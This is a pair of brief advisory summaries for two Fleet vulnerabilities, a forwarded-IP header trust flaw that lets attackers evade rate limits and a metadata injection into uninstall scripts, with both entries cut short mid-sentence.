CVE-2026-46356 affects Fleet versions before 4.80.1. Fleet’s client-IP extraction logic accepted forwarded IP headers without verifying that they came from a trusted proxy, which let unauthenticated attackers vary those headers and evade per-IP rate limits and IP bans. The practical risk is increased exposure of public Fleet deployments to brute-force login and credential-stuffing attempts, especially whe [truncated]
CVE-2026-26191 is a Fleet device-management vulnerability in the software installer pipeline. If a crafted software package is uploaded and later uninstalled, unsanitized metadata from that package can be inserted into auto-generated uninstall scripts. When those scripts run on managed endpoints, an attacker could trigger unintended command execution with elevated privileges: root on macOS/Linux or SYSTEM [truncated]
